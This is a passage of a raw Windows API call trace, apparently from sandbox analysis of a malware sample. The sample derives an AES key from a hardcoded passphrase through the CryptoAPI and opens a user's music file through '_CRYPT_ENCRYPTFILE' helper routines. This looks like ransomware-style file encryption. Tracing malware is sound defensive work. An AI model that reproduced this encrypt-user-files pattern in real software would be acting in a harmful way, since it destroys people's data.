lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.104] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.104] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0118.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.105] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0118.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0118.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca1c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0118.107] CloseHandle (hObject=0x298) returned 1 [0118.107] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.107] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0118.107] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d50a20, ftCreationTime.dwHighDateTime=0x1d5e269, ftLastAccessTime.dwLowDateTime=0x90642aa0, ftLastAccessTime.dwHighDateTime=0x1d5ec9a, ftLastWriteTime.dwLowDateTime=0x90642aa0, ftLastWriteTime.dwHighDateTime=0x1d5ec9a, nFileSizeHigh=0x0, nFileSizeLow=0xee2a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="vgfSxUhhzUZpNrrLJ3hR.mp3", cAlternateFileName="VGFSXU~1.MP3")) returned 0x41ac180 [0118.107] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0118.107] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.107] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.107] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0118.107] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0118.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0118.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0118.108] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0118.108] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0118.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.108] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0118.108] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.109] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0118.109] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0118.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.109] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0118.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0118.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca790, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0118.109] CryptHashData (hHash=0x41ac500, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0118.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.109] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0118.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0118.110] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac600) returned 1 [0118.110] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0118.110] CryptDestroyHash (hHash=0x41ac500) returned 1 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0118.111] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0118.111] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0118.111] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0118.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.111] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\vgfsxuhhzuzpnrrlj3hr.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0118.112] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.112] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0118.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0118.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0118.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) 